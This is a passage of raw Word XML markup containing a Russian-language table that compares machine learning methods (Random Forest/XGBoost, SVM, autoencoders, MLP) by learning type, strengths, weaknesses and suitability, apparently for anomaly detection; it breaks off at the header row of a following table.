              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2036" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="254E5BAB" w14:textId="69203E08" w:rsidR="00C022BB" w:rsidRPr="00C022BB" w:rsidRDefault="00C022BB" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="001B38D2" w14:paraId="29471C41" w14:textId="77777777" w:rsidTr="00E27915">
        <w:trPr>
          <w:trHeight w:val="2220"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1936" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27F82EF3"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val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Деревья</w:t>
            </w:r>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>решений</w:t>
            </w:r>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Random Forest, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>XGBoost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="772DE090"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С учителем</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="360CEEAC" w14:textId="63902D1A"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 xml:space="preserve">Высокая </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>интерпре</w:t>
            </w:r>
            <w:r w:rsidR="00D1702E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>тируемость</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>, устойчивость к шуму</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="292D07CA" w14:textId="2D1F1D88"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 xml:space="preserve">Требует ручной инженерии признаков, плохо работает с </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>последо</w:t>
            </w:r>
            <w:r w:rsidR="00D1702E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>вательностями</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2036" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F9098EA"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Базовый эталон для сравнения</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="001B38D2" w14:paraId="37B391B7" w14:textId="77777777" w:rsidTr="00E27915">
        <w:trPr>
          <w:trHeight w:val="1617"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1936" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2813BBE3"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Метод опорных векторов (SVM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="181BB7E1"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С учителем</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A69DFFE"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Эффективен в пространствах высокой размерности</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AC30863" w14:textId="1CA104EB"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 xml:space="preserve">Низкая </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00ED4CBB" w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>масштаб</w:t>
            </w:r>
            <w:r w:rsidR="00ED4CBB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>ируе-мость</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>, чувствителен к выбору ядра</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2036" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37259435"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Не рекомендуется для потоковой обработки</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="001B38D2" w14:paraId="3A343109" w14:textId="77777777" w:rsidTr="00D1702E">
        <w:trPr>
          <w:trHeight w:val="2148"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1936" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EE9F8DC"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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Автокодировщики</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Autoencoder</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70FD18E3"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Без учителя</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38B0BE2B"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Выявление неизвестных аномалий, работа без размеченных данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F7C3B47"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Сложность настройки, риск ложных срабатываний на легитимных аномалиях</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2036" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BFB13D3" w14:textId="2204CAC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 xml:space="preserve">Возможно, для </w:t>
            </w:r>
            <w:r w:rsidR="00D1702E" w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>пред обучения</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="001B38D2" w14:paraId="5A07ABFD" w14:textId="77777777" w:rsidTr="00D1702E">
        <w:trPr>
          <w:trHeight w:val="1696"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1936" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F4A06A0"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Многослойный персептрон (MLP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55ED1897"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С учителем / Без</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03D54B6D"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Простота реализации, высокая скорость вывода</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28BB3DA9" w14:textId="336A56F5"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Не учитывает временные зависимости</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2036" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3239448D"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Базовая архитектура для векторных признаков</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64AFE2C6" w14:textId="77777777" w:rsidR="00812517" w:rsidRDefault="00812517"/>
    <w:p w14:paraId="2B4A567D" w14:textId="55B55F7A" w:rsidR="00C022BB" w:rsidRPr="00C022BB" w:rsidRDefault="00C022BB">
      <w:pPr>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11</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9686" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1936"/>
        <w:gridCol w:w="1461"/>
        <w:gridCol w:w="2127"/>
        <w:gridCol w:w="2126"/>
        <w:gridCol w:w="2036"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C022BB" w:rsidRPr="001B38D2" w14:paraId="140C4DF1" w14:textId="77777777" w:rsidTr="00C022BB">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1936" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A59633E" w14:textId="4EF41A72" w:rsidR="00C022BB" w:rsidRPr="00C022BB" w:rsidRDefault="00C022BB" w:rsidP="00C022BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="32412255" w14:textId="05A76A19" w:rsidR="00C022BB" w:rsidRPr="00C022BB" w:rsidRDefault="00C022BB" w:rsidP="00C022BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07CEE46F" w14:textId="029DFD07" w:rsidR="00C022BB" w:rsidRPr="00C022BB" w:rsidRDefault="00C022BB" w:rsidP="00C022BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
